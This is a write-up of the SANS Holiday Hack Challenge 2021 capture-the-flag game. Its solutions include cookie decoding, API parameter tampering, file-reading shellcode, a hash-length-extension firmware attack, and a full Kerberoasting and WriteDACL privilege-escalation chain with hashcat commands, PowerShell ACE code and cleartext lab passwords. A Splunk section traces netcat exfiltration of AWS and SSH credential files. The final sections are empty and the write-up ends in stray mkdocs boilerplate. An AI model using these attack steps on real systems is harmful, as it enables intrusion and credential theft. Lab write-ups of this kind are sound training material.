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SANS Holiday Hack Challenge 2021



This document is a writeup of SANS holiday challenge 2021. This document has answers of all the objectives (total 13), high-level approach as well as details on how those answers were derived.

Objective completed The story
drawing Listen children to a story that was written in the cold
'Bout a ringle and his castle hosting hackers, meek and bold
Then from somewhere came another, built his tower tall and proud
Surely, he, our Frosty villain hides intentions 'neath a shroud
So begins Jack's reckless mission: gather trolls to win a war
Build a con that's fresh and shiny, has his yet been done before?
Is his Fest more feint than folly? Some have noticed subtle clues
Running 'round and raiding repos, stealing Santa's Don'ts and Do's
Misdirected, scheming, grasping, Frost intends to seize the day
Funding research with a gift shop, can Frost build the better sleigh?
Lo, we find unlikely allies: trolls within Jack's own command
Doubting Frost and searching motive, questioning his dark demand
Is our Jack just lost and rotten - one more outlaw stomping toes?
Why then must we piece together cludgy, wacky radios?
With this object from the heavens, Frost must know his cover's blown
Hearkening from distant planet! We the heroes should have known
Go ahead and hack your neighbor, go ahead and phish a friend
Do it in the name of holidays, you can justify it at year's end
There won't be any retweets praising you, come disclosure day
But on the snowy evening after? Still Kris Kringle rides the sleigh

Answer to objectives and High-level approach

Objectives Answers High level approach
1.Kringlecon Orientation answer Write “answer” in the top pane of the terminal presented by the elf Jingle Ringford.
2.Where in the world is Carmel Santaigo? Solved in the game OWASP Sensitive data exposure :
(In the flask cookie) Get the hints about the elf and their route info by decoding the flask cookie and use it in the game to follow and find the elf.
3.Thaw Frost Tower's entrance Solved in the game API Abuse :
Use the API http://nidus-setup:8080/api/cooler to increase the temperature of the thermostat to thaw the frozen entrance.
4.Slot machine Investigation I'm going to have some bouncer trolls bounce you right out of this casino! API Abuse:
Manipulate the “numline” parameter sent to to increase the bet amount an exceed 1000 coins and reveal the answer.
5.Strange USB Device ickymcgoop USB Rubber Ducky :
Use to decode the encoded USB ducky script (/mnt/USBDEVICE/inject.bin). In the decoded value, find another reversed base64 value, reverse it and decode to find the user for whom an authorized_key file is getting created with the public cert.
6.Shellcode Primer cyber security knowledge Shell code :
On Step 11) '/var/northpolesecrets.txt'
1. Call sys_open to open the file
2. Call sys_read to read the file using buffer (mov rsi, rsp)
3. Call sys_write to write contents from rsp to stdout (Keep the count high e.g., 1000 so we can account for all contents in the file)
7.Printer Exploitation Troll_Pay_Chart.xlsx Hash Length extender attack :
1.Download the firmware, decode the firmware field from base64 to extract the zip file.
2.Craft the payload to copy the name of last printed xlsx file to a new file and copy the file to /incoming folder.
3.Use hash extender to append our payload zip to original zip file using hash and base64 encode the output. Create the JSON firmware from it.
4. Upload the new JSON firmware to the portal.
5. Download the file from /incoming folder which will have the name of the last printed .xlsx file.
8.Kerberoasting on an Open Fire Kindness Kerberoasting and WriteDACL abuse :
1.Get the two shared folders in the network using our user: elfu_svc_shr and research_dep
2.Kerberoasting attack to get TGS (Ticket granting service) hash for elfu_svc.
3.Use Hashcat to crack TGS hash for elfu_svc user.
4.Get hard coded creds for remote_elf embedded in PowerShell script which is stored in \elfu_svc_shr share.
5.PrivEsc – Use WriteDACL to add our low priv. user to AD group “Research Department”.
6.Access the secret document “SantaSecretToAWonderfulHolidaySeason.pdf” in the \reserach_dep to find the answer.
9.Splunk whiz Splunk queries on Sysmon and Github audit data
(Described in the relevant section below)
10.Now Hiring CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX Server-Side Request Forgery (SSRF) on EC2 hosted website:
1.Website has URL as an input in the “URL to your NLBI report” field.
2.Send in the URL and see the name of IAM role (“jf-deploy-role”) attached to the EC2 instance returned in the response of the GET request of an image.
3.Send in the URL input and get the secret access key returned in the response of the GET request of an image.
11.Customer Complaint Analysis Flud Hagg Yaqh Packet Analysis using Wireshark for RFC 3514 compliance:
1. From .pcap file, find the room number for the guest who is RFC 3514 non-compliant using ip.flags.rb == 0
2.From the .pcap file, find the trolls who are compliant (ip.flags.rb == 1) and complaining about the guest in the room number found in 1)
12. Frost Tower Website Checkup Clerk OWASP broken auth and SQL Injection attacks:
1.Examine the source code
2.Broken auth: Exploit the /postcontact endpoint to log in and get access to the dashboard.
3.SQL Injection: Exploit the /detail endpoint to get additional table name (“todo”) and its column names.
4.Get data from table “todo” table having the job position for Santa.
13. FPGA Programming TBD TBD

1. Kringlecon Orientation

Upon login on, we see Jingle Ringford guarding the entry asking below

First things first, here's your badge! It's that wrapped present in the middle of your avatar.
Click on the badge on your avatar 🎁.
That’s where you will see your Objectives, Hints, and gathered Items for the Holiday Hack Challenge.
We’ve also got handy links to the KringleCon talks and more there for you!
Next, click on that USB wifi adapter - just in case you need it later.


drawing drawing

We pick up the Wi-Fi adapter.
We click on the terminal to access it and then type “answer” in the upper pane of the terminal and the gate is opened.

drawing drawing

2. Where in the world is Carmel Santaigo

drawing Hints from Tangle Coalbox
Turns out some elves have gone on some misdirected journeys around the globe.
It seems that someone is messing with their travel plans.
We could sure use your open-source intelligence (OSINT) skills to find them.
Why dontcha' log into this vintage Cranberry Pi terminal and see if you have what it takes to track them around the globe.
If you're having any trouble with it, you might ask Piney Sappington right over there for tips.

Tangle Coalbox indicates another elf named “Piney Sappington” may have some hints on how to solve this objective.
So, we head over to that elf now who is also present in the courtyard.

drawing Hints from Piney Sappington
You see, I've been looking at these documents, and I know someone has tampered with one file.
Do you think you could log into this Cranberry Pi and take a look?
It has exiftool installed on it, if that helps you at all.
I just... Well, I have a feeling that someone at that other conference might have fiddled with things.
And, if you help me figure this tampering issue out, I’ll give you some hints about OSINT, especially associated with geographic locations!

In the terminal we are presented with the below problem:

HELP! That wily jack Frost Modified one of our naughty/nice records, and right before Christmas! Can you help us which one? We’ve installed exiftool for your convenience!


We will get the Last Modified By attribute value for all the docx files and then grep the output it with “Jack”.
That should give us all the files which were last modified by Jack Frost.
We have -C 5 in the grep so we can get the lines around the matches for the context.

Command entry and output :
Answer verification :
Achivement Unlocked :
Hint Unlocked :

The “flask cookies” hint is actually a Github Gist from Mr. Chris Elgee.
That above gist shows how one can decode the value in a cookie generated by Flask applications.

Going back to objective #2 we start the game.
In the browser we open developer tools.
Under developer tools > Application tab there is a cookie named "Cookiepella" for the domain used for the challenge (


We follow the instructions to decode the value in the flask cookie to JSON.

cookie = "<value of the cookiepella cookie>"
import zlib; import itsdangerous


We format the output JSON for better understanding.
The JSON has details about the elf to identify them.
The JSON has also has the route the elf took. We can take the same route to catch the elf.

On the visit interlink page, we supply data we have in the decoded flask cookie and click on "Filter Elves".

The elves have been filtered out based on the data and possibly Its Morcel Nougat and their location was "Santa's Castel"
Both of these datapoints are also in the decoded cookie value.

Note the route taken by the elf in the decoded cookie value:
Stuttgart, Germany > Tokyo, Japan > London, England > PlaceHolder
We click on "Depart by sleigh" to follow the same route to catch up with the elf in London, England.

In London, England, we notice there is no option to "Depart by Sleigh"
which indicates we are close to the elf. We click on Investigate.
We are presented with 3 investigate options.
drawing drawing

When we click on "Investigate 1", It says we have caught up to the elf.
We are given the option to guess the elf.
We choose "Morcel Nouget" since Its also in the name of the elf in the decoded cookie. drawing

Upon selecting the elf and clicking on the “Guess Elf”
The message "You've won" appears which means we have completed the challenge.

3. Thaw Frost Tower Entrance

Challenge :
Turn up the heat to defrost the entrance to Frost Tower.
Click on the Items tab in your badge to find a link to the Wifi Dongle's CLI interface. Talk to Greasy Gopherguts outside the tower for tips
Difficulty Level :
Location :
Frost Tower Entrance
Elf/Troll :
drawing Grimy McTrollkins
drawing Hints from Grimy McTrollkins
Yo, I'm Grimy McTrollkins.
I'm a troll and I work for the big guy over there: Jack Frost.
I’d rather not be bothered talking with you, but I’m kind of in a bind and need your help.
Jack Frost is so obsessed with icy cold that he accidentally froze shut the door to Frost Tower!
I wonder if you can help me get back in.
I think we can melt the door open if we can just get access to the thermostat inside the building.
That thermostat uses Wi-Fi. And I’ll bet you picked up a Wi-Fi adapter for your badge when you got to the North Pole.
Click on your badge and go to the Items tab. There, you should see your Wi-Fi Dongle and a button to “Open Wi-Fi CLI.” That’ll give you
command-line interface access to your badge’s wireless capabilities.

Click on the badge and go to the Items tab. There, we see the Wi-Fi Dongle and a button to “Open Wi-Fi CLI.”
That gives us command-line interface access to wireless capabilities.

drawing drawing

Scan for any available the ESSIDs

iwlist wlan0 scanning 


We find an ESSID named “FROST-Nidus-Setup”.
Now we connect to “FROST-Nidus-Setup” ESSID.

iwconfig wlan0 essid FROST-Nidus-Setup


Connection succecssful to the ESSID.
Issue a curl command to http://nidus-setup:8080.

curl http://nidus-setup:8080


Looks like few APIs are hosted there.
Access the API docs
Note the /api/cooler does not need registration

curl http://nidus-setup:8080/apidoc


Following the documentation, we make use of /cooler endpoint passing a temperature which may melt ice e.g., 110 degrees

curl -XPOST -H 'Content-Type: application/json' \
  --data-binary '{"temperature": 110}' \


The jack frost tower entrance is now open and the objective is now completed.



4. Slot Machine Investigation

Challenge :
Test the security of Jack Frost's slot machines.
What does the Jack Frost Tower casino security team threaten to do when your coin total exceeds 1000? Submit the string in the server data.response element.
Talk to Noel Boetie outside Santa's Castle for help.
Difficulty Level :
Location :
Frost Tower Lobby
Elf/Troll :
drawing Hubris Selfington
drawing Hints from Hubris Selfington
The big boss told me he’s worried about vulnerabilities in his slot machines, especially this one.
Statistically speaking, it seems to be paying out way too much.
He asked me to see if there are any security flaws in it.
The boss has HUGE plans and we’ve gotta make sure we are running a tight ship here at Frost Tower.
The objective states “Submit the string in the server data. response element”

Clicking on the slot machine behind the troll opens where we can click “Play game” to open the game.

drawing drawing

We open Burp Suite and capture traffic for only
Click "Spin" in the bottom right corner.

Burp intercepts the requests and shows a POST request to the /api/v1//spin with three parameters:

  1. betamount
  2. numline
  3. cpl


We investigate with repeater, sending 1001 to the betamount parameter and It does not work.

Keeping the betamount parameter as 1001 (because we need to bet with >1000 coins), we manipulate the other two parameters, numline and cpl, send them to the API to see if we are successful.

Manipulating parameter values Request Response
Decrease cpl to 0.0 drawing drawing
Increase cpl to 0.2 drawing drawing
Decrease numline to 10 drawing drawing
Increase numline to 30 drawing drawing
Make numline a negative number drawing drawing

Full request and response showing sending a negative value in the numline parameter would show a message in a new field named "response".

The successful response shown below :

data.response :
I'm going to have some bouncer trolls bounce you right out of this casino!

We submit the highlighted as the answer for the Slot Machine Investigation objective and its accepted!

5. Strange USB device

Challenge :
Assist the elves in reverse engineering the strange USB device. Visit Santa's Talks Floor and hit up Jewel Loggins for advice.
Difficulty Level :
Location :
Santa’s talk floor
Elf/Troll :
drawing Morcel Nougat
drawing Hints from Morcel Nougat :
Do you know anything about USB Rubber Duckies? I've been playing around with them a bit myself.
Please see what you can do to help solve the Rubber Ducky Objective!
Talk by Kevin Tyers
HIDden Duckey, Deconstructed Payload

We open the terminal and presented with a question
Question: What is the troll username involved with this attack.

We see there is an inject.bin under /mnt/USBDEVICE

We do the file listing and we see a python file named “”.
If we look at the contents of the file, we see the python script takes an "inject.bin" file as an input drawing drawing

We run the with the inject.bin as input.

python ./ --file /mnt/USBDEVICE/inject.bin

The rubber ducky binary inject.bin is decoded. We see a few interesting things being done in the original file. Numbered in the screenshot below :

  1. There is a hardcoded base 64 string which looks like reversed ("==" in the front)
  2. The "rev" used to reverse the already reversed base64 string making it a proper base64 string.
  3. "base64" command with -d switch to decode the base64 string


So we take the above line from the source code and execute in the terminal
The base64 is reversed and decoded to reveal the user’s name.


In the above an authorized_key file is getting created with the public cert for the user ickymcgoop. The answer is ickymcgoop

We submit that username as the answer. drawing

The answer gets accepted and we complete this objective. drawing drawing

6. Shell Code Primer

Challenge :
Complete the Shellcode Primer in Jack's office.
According to the last challenge, what is the secret to KringleCon success? "All of our speakers and organizers, providing the gift of ____, free to the community."
Talk to Chimney Scissorsticks in the NetWars area for hints.
Difficulty Level :
Location :
Jack’s Office
Elf/Troll :
drawing Ruby Cyster
drawing Hints from Ruby Cyster :
I'm looking at this system, and it has me a little bit worried.
If I didn't know better, I'd say someone here is learning how to hack North Pole systems.
Who's got that kind of nerve!
Anyway, I hear some elf on the other roof knows a bit about this type of thing.
The website is
This objective has 11 steps. 1-10 are easy to follow tutorials which will be used for step 11. Step 11 has no hints and solving that would answer this objective.
Therefore, in the interest of documentation for other objectives in the report we are doing to provide details on step 11 only.

Shell Code for step 11. Reading a file (/var/northpolesecrets.txt)

call doit
db '/var/northpolesecrets.txt',0

mov rax, 2
pop rdi
mov rsi, 0
mov rdx, 0

; TODO: Call sys_read on the file handle and read it into rsp
;push rdi ; Temporarily store the filename pointer
;push rax ; Temporarily store the handle
;pop rdi ; Move the file handle into rdi
;pop rsi ; 
mov rdi, rax ; sys_open returns the fd into rax, so move it to rdi before set rax to sys_read.
mov rax, 0 ; Syscall 0 = sys_read
mov rdx, 1000 ; rdx is the count
mov rsi,rsp; from the hint

; TODO: Call sys_write to write the contents from rsp to stdout (1)
mov rax, 1 ; Syscall 1 = sys_write
mov rdi, 1 ; File handle to write to = stdout = 1  ; (rsi is already the buffer)
mov rdx, 1000; rdx is the count again 
mov rsi, rsp; from the hint
syscall ; Perform the sys_write syscall, writing the data to stdout

; sys_exit
mov rax, 3Ch ; for sys_exit
mov rdi, 0 ; exit code

The deugger

The full content of the file (/var/northpolesecrets.txt) is below.
Secret to KringleCon success: all of our speakers and organizers, providing the gift of cyber security knowledge, free to the community

The missing part in the question is "cyber security knowledge".
We submit it as the answer to this objective and Its now Its completed.


7. Printer Exploitation

Challenge :
Investigate the stolen Kringle Castle printer. Get shell access to read the contents of /var/spool/printer.log. What is the name of the last file printed (with a .xlsx extension)?
Find Ruby Cyster in Jack's office for help with this objective.
Difficulty Level :
Location :
Jack’s Office
Elf/Troll :
drawing Ruby Cyster
drawing Hints from Ruby Cyster (Because we solved the objective “Shellcode primer”) :
  1. You should definitely look at the firmware
  2. Pick the firmware apart and see what's there.
  3. If you append multiple files of that type, the last one is processed.
  4. Look at hash Extension Attacks. Link 1 | Link 2
  5. Files placed in /app/lib/public/incoming will be accessible under
Website :

Examination of firmware

Following the grinch's first hint, we go to > Firmware update > Download current firmware and download it. It’s basically a JSON file.
The element firmware has the firmware data in it. drawing

Decode it and save the output to a file named firmware_hhc2021


We determine the file type and we see It’s a zip file so we rename the file to


Building our own payload

We build a bin file with above and name it firmware_ashish.bin.
This will copy the last entry of the xlsx file from /var/spool/printer.log and save in a new file named /app/lib/public/incoming/ashish.

grep xlsx /var/spool/printer.log | tail -n1 > /app/lib/public/incoming/ashish

Provide execute permission on the firmware_ashish.bin drawing

Zip firmware_ashish.bin to drawing

Extend the original firmware payload with our custom payload

We make use of hash extender.
Download the source and build it.

git clone
cd hash_extender


Now we havd the original firmware and custom drawing

Now will need to append our payload to the original

Following the readme on
Below would be our inputs to the hash_extender.

Hash Extender Switch Spplied values and explaination
The original payload from printer portal in zipped format
--append $(cat | xxd -p -c 99999)
HEX representation of our payload in the zip file (
--append-format hex
(because we are appending a HEX value)
--secret 16
(Present in the original JSON file we downloaded from the printer portal)
--format sha256
(Present in the original JSON file we downloaded from the printer portal)
--signature 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97
(Present in the original JSON file we downloaded from the printer portal)
--out-data-format hex

We fire up hash_extender with the above switch values :

./hash_extender --secret=16 
--signature ="2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97" 
--append=$(cat | xxd -p -c 99999) --format sha256 --out-data-format=hex

This produced a new string and new signature.


The new string produced is in hex format (as we specified in the --out-data-format).
So, we need to use Cyberchef to convert the hex to base64.


This output from CyberChef has our appended paylod to get the file name.
Now we update the original firmware_export.json with the new payload and the new signature we got above. drawing

Now we upload the new firmware-export.json back to the portal.
We browse the file
File "ashish" is downloaded and we can see the xlsx file name in it.


We submit “Troll_Pay_Chart.xlsx” as the answer to this objective and it is accepted.


8. Kerberoasting on an Open Fire

Challenge :
Obtain the secret sleigh research document from a host on the Elf University domain.
What is the first secret ingredient Santa urges each elf and reindeer to consider for a wonderful holiday season?
Start by registering as a student on the ElfU Portal. Find Eve Snowshoes in Santa's office for hints.
Difficulty Level :
Location :
Santa’s Office
Elf/Troll :
drawing Eve Snowshoes
drawing Please note this objective was not near Eve Snowshoes but since they provided such cool hints, I wanted to keep this elf here.
Hints from Eve Snowshoes : (Because we solved their terminal challenge “HoHo…No”)
  1. There's a great talk by Chris Davis on this exact subject!
  2. There are also plenty of resources available to learn more about Kerberoasting specifically.
  3. If you have any trouble finding the domain controller on the 10.X.X.X network, remember that, when not running as root, nmap default probing relies on connecting to TCP 80 and 443.
  4. Got a hash that won't crack with your wordlist? OneRuleToRuleThemAll.rule is a great way to grow your keyspace.
  5. Where'd you get your wordlist? CeWL might generate a great wordlist from the ElfU website,but it will ignore digits in terms by default.

We first solve the HoHo..No terminal challenge from Eve Snowshoes.

HoHo..No Terminal Challenge

This terminal challenge needs us to identify the malicious IP addresses in the logs and add them to the naughty list so It could be blocked using fail2ban.

Thre is an excellent talk by Mr. Andy Smith on Fail2ban whicih immensely helped in solving this terminal challenge. drawing

First find all the patterns of log entries in the/var/log/hohono.log
Exclude all the successful logins or valid heartbeats and put other in ashish.log.

cat /var/log/hohono.log | grep -v -e "success" -e "Valid heartbeat" > ashish.log

Replace all the IP addresses in ashish.log with naughty_ip

sed -i -e 's/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/naughty_ip/g' ashish.log

Get only the messages

cat ashish.log | cut -d ' ' -f3- | sort | uniq

Sample Unique log entries

Unique patterns of the log entries

Failed login from for user
Invalid heartbeat '' from
Login from rejected due to unknown user name
sent a malformed request

Now we can create the custom jail and then filter and actions for the custom jail.

Creating the custom jail

nano /etc/fail2ban/jail.d/my_jail.conf

Below would be the content of the my_jail.conf

enabled = true
logpath = /var/log/hohono.log
findtime = 60m
maxretry = 10
bantime = 30m
filter = my_filter
action = my_action

Creating the custom filter

nano /etc/fail2ban/filter.d/my_filter.conf

Below would be the content of the my_filter.conf

failregex = <HOST> sent a malformed request$
Failed login from <HOST>
Login from <HOST> rejected due to unknown user name$
Invalid heartbeat \S+ from <HOST>$

Creating the custom action

nano /etc/fail2ban/filter.d/my_action.conf

Below would be the content of the my_action.conf
Please note this is where we add the IP addresses we have identified to get added to the naughtly list to ban using fail2ban.

actionban   = /root/naughtylist add <ip>
actionunban = /root/naughtylist add <ip>

Restart the fail2ban service

service fail2ban restart

Refresh the naughtylist

./naughtylist refresh

Achievement unlocked :

Now we go over to objective#8 Kerberoasting

Registration and SSH to elfu.local domain

We register on using a custom domain.
We are provided a domain user named rflkkildwi and the password for it.

SSH to grades.elfu.local as rflkkildwi :

We see the below menu:

We escape the SSD using Ctrl+D.
Once in Python, use below to spawn an interactive bash shell.

import pty; pty.spawn("/bin/bash")  

Conduct reconnaissance :
Username and Hostname :
Local IP :
Get the neighbours. There are 4 of them.

Conduct nmap scan on top 10 ports on each of those hosts to know what services are running there.
Looks like and are running SMB and may have shared folders.

nmap -top-ports 10 nmap -top-ports 10
drawing drawing

We look for shared folders on and
Looks like has two shared folders but the user rfkkildwi does not have access on these shares

  1. \\ \elfu_svc_shr
  2. \\ \research_dep

Request TGS ticket for the users in Hashcat format. The ticket is encrypted with account’s password so it can be brute forced offline. drawing

Cracking the TGS hash for elfu.local\elfu_svc to get plaintext password

Downloading the OneRuleToRuleThemAll.rule

We have the TGS hash for elfu_svc form previous step.
We copy the has to local kali machine as hash.txt.
We will download OneRuleToRuleThemAll.rule from here.

wget > OneRuleToRuleThemAll.rule

Generate the word list

Generate the word list using CeWL with –with-number option so it does not ignore digits.

cewl --with-numbers  > wordlist.txt

Crack the TGS hash using Hashcat

Now we use the OneRuleToRuleThemAll.rule and wordlist.txt with Hashcat.

hashcat -m 13100 -a 0 hash.txt --potfile-disable -r OneRuleToRuleThemAll.rule --force -O -w 4 --opencl-device-types 1,2 wordlist.txt

We have the plaintext password for elfu_svc.
Snow2021! drawing

Enumerate the file share "elfu_svc_shr" and get hard coded creds for remote_elf in the script

smbclient \\\\\\elfu_svc_shr -U=elfu_svc

Enter the password “Snow2021!” (Without quotes).
And now we are able to enumerate all the files.

Check for any hard coded passwords.

#Set the prompt Off
prompt OFF
#Download all the files
mget *
#Exit out of the smbclient
#Grep for ConvertTo-SecureString in all the files since you use that on plain text creds to convert to # secure strings
grep -C 2 ConvertTo-SecureString *


Looks like GetProcessInfo.ps1 has the hard coded credentials for another domain user named elfu.local\remote_elfu for a host
The credentials look encrypted though. So, we may to convert that to plain text.


Get the password for the elfu.local\remote_elf

Run this in the terminal PowerShell 7

$key = (2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7)
$aPass = $SecStringPassword | ConvertTo-SecureString -Key $key
ConvertFrom-SecureString -SecureString $aPass -AsPlainText 

drawing We have the password for elfu.local\remote_elf:

Logon To Domain controller (DC01) using elfu.local\remote_elf

At this point we have the password for elfu.local\remote_elf which is A1d655f7f5d98b10!.
But this user also does not have access to \\research_dep.
So, we may need to escalate privileges of our user (rflkkildwi) and let's see if we can leverage elfu.local\remote_elf for that.

Let’s login to the host using elfu.local\remote_elf.
First enter into PowerShell



Get the PSCredential object using the secure string.

# Setting up the creds
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)


Using the creds above, create a new PowerShell session on

New-PSSession -Computer -Credential $aCred

A new PowerShell session is created with id 1.

We enter the PowerShell session of with name DC01 which looks like a domain controller when examining with Get-ADDomainController.

Enter-PSSession -Id 1
Get-ADDomainController -Discover -domain "elfu.local" -Service "PrimaryDC","TimeService"


Privilege Escalation

This involves escalating privileges of our user "rflkkildwi".
We do this by adding this user to "Research Department" AD group leveraging elfu.local\remote_elf.

Find which AD group the user elfu.local\remote_elf has writeDACL permission.
Tried with domain admins. This does not have writeDACL permission for remote_elf.

$ADSI = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=elfu,DC=local"

So, we numerate all the groups to see if something interesting come up.

Get-ADGroup to get all AD groups :
This “Research Department” group looks interesting :

We see all the Access rules for Research Department and we can see remote_elf has writeDACL permission on that group.

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local" 


Using remote_elf, add "GenericAll" permission for the user "rflkkildwi" to the identified AD group.

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "rflkkildwi"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl

We can verify if the GenericAll permission has been added for user "rflkkildwi" for AD group "Research Department"

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local" 


Using remote_elf, add user "rflkkildwi" to the identified AD group.

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "rflkkildwi"
$password = "Pvwevsviq#"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
$user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
$b=New-Object byte[] $sid.BinaryLength

We can verify if the user "rflkkildwi" to the "Research Department" group.

Get-ADGroupMember -Identity 'ResearchDepartment' | Where-Object {$ -eq "rflkkildwi"}


Access the secret document

At this point rflkkildwi is added to the "Research Department" group.
So now we can access the document in the share '\\research_dep' using "rflkkildwi" .

smbclient '\\\research_dep'


Also can download the PDF from the share to the grade.elfu.local.

Change the shell to bin/bash on the session
Enter chsh to change your shell to /bin/bash.



From local kali box download the document from the

Open the PDF locally to see the 1st secret ingredient – kindness
We use that as the answer for the objective and now the objective is completed. drawing drawing

9. Splunk

Challenge :
Help Angel Candysalt solve the Splunk challenge in Santa's great hall.
Fitzy Shortstack is in Santa's lobby, and he knows a few things about Splunk. What does Santa call you you complete the analysis?
Difficulty Level :
Location :
Great Room
Elf/Troll :
drawing Angel Candysalt
drawing Hints from Andy Candysalt
Anywho, I'm back at Santa’s Splunk terminal again this year.
There's always more to learn!
Take a look and see what you can find this year.
With who-knows-what going on next door, it never hurts to have sharp SIEM skills!.
Task 1

Capture the commands Eddie ran most often, starting with git.
Looking only at his process launches as reported by Sysmon, record the most common git-related CommandLine that Eddie seemed to use.

Splunk Query
index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational CommandLine="git*" 
| stats count by CommandLine 
| sort count desc



git status

Task 2

Looking through the git commands Eddie ran, determine the remote repository that he configured as the origin for the 'partnerapi' repo.
The correct one!


Referred the below article on how to add a remote repository :
The git remote add command takes two arguments:

  • A remote name, for example, origin
  • A remote URL, for example,
Splunk Query
index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational eddie partnerapi 
CommandLine="*git remote add*"



git remote add

Task 3

Eddie was running Docker on his workstation. Gather the full command line that Eddie used to bring up a the partnerapi project on his workstation.


How to start and run the app on docker.

docker compose up

Ref : Docker docs
"Run docker compose up and the Docker compose command starts and runs your entire app"

Splunk Query
index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational eddie partnerapi Computer="emcjingles-l" CommandLine="docker compose up"



docer compose up

Task 4

Eddie had been testing automated static application security testing (SAST) in GitHub. Vulnerability reports have been coming into Splunk in JSON format via GitHub webhooks.
Search all the events in the main index in Splunk and use the sourcetype field to locate these reports.
Determine the URL of the vulnerable GitHub repository that the elves cloned for testing and document it here.
You will need to search outside of Splunk (try GitHub) for the original name of the repository.


First we check how many Git repositories have been used

index=main sourcetype=github_json | stats values(repository.git_url)


Above shows two github repositories.
drawing drawing

But the question is "Determine the URL of the vulnerable GitHub repository that the elves cloned for testing"
If we look at the elfnp3/dvws-node, looks like its cloned from snoopysecurity/dvws-node.


snoopysecurity/dvws-node is the "Damn Vulenerable Web Services"
Therefore the answer would be

drawing drawing


Task 5

Santa asked Eddie to add a JavaScript library from NPM to the 'partnerapi' project.
Determine the name of the library and record it here for our workshop documentation.

npm install

Splunk query
index=main eddie CommandLine="*npm install*" partnerapi




Task 6

Another elf started gathering a baseline of the network activity that Eddie generated.
Start with their search and capture the full process_name field of anything that looks suspicious.


If we look at the search provided in the task

index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=3 user=eddie NOT dest_ip IN (127.0.0.*) NOT dest_port IN (22,53,80,443) 
| stats count by dest_ip dest_port

The IP address belongs to github and It us called from the git process(usr/bin/git).
But the IP belongs to AWS.
Most importantly It is being called from /usr/bin/nc.openbsd which can be used for making arbitrary TCP and UDP connections and listens.
[ref :
This may be a suspicious action and may be potential reverse shell.
Therefore the suspicious process name would be /usr/bon/nc.openbsd.

drawing drawing



Task 7

Uh oh. This documentation exercise just turned into an investigation.
Starting with the process identified in the previous task, look for additional suspicious commands launched by the same parent process.
One thing to know about these Sysmon events is that Network connection events don't indicate the parent process ID, but Process creation events do!
Determine the number of files that were accessed by a related process and record it here.


Searching for the "/usr/bin/nc.openbsd" process

index=main process_name="/usr/bin/nc.openbsd"

We see command line nc.openbsd ran the commandline "nc -q1 16842".
Which means it connects to the IP address on port 16842.
The parent process here is 6788.

Now if we look for ParentProcessId 6788.

index=main ParentProcessId=6788

We see 6 files being red via /usr/bin/cat

  1. /home/eddie/.aws/credentials
  2. /home/eddie/.ssh/authorized_keys
  3. /home/eddie/.ssh/config
  4. /home/eddie/.ssh/eddie
  5. /home/eddie/.ssh/
  6. /home/eddie/.ssh/known_hosts

So, the answer is 6.
drawing drawing



Task 8

Use Splunk and Sysmon Process creation data to identify the name of the Bash script that accessed sensitive files and (likely) transmitted them to a remote IP address.
Determine the number of files that were accessed by a related process and record it here.

index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational user=eddie process="*bash*" CommandLine="/bin/bash *" | table CommandLine

From sysmon process creation data, there is only one bash script which got executed.

(index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 CommandLine="*.sh"  ParentCommandLine="/bin/sh")
(index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=3 process_name="/bin/sh")
| fields ProcessId,ProcessID,ProcessGuid,CommandLine,process_current_directory,dest
| stats values(ProcessId) as ProcessId values(ProcessID) as ProcessID  values(CommandLine) as CommandLine values(process_current_directory) as process_current_directory  values(dest) as dest by ProcessGuid

drawing drawing

Objective complete

On submitting answer to the task 8, we get the below text :
Thank you for helping Santa complete this investigation! Santa says you're a whiz
We submit whiz as the answer for the objective #9 and Its accepted.

drawing drawing

10. Now Hiring

11. Customer Complaint Analysis

12. Frost Tower Website Checkup

13. FPGA Programming

  • mkdocs new [dir-name] - Create a new project.
  • mkdocs serve - Start the live-reloading docs server.
  • mkdocs build - Build the documentation site.
  • mkdocs -h - Print help message and exit.

    mkdocs.yml # The configuration file. docs/ # The documentation homepage. ... # Other markdown pages, images and other files.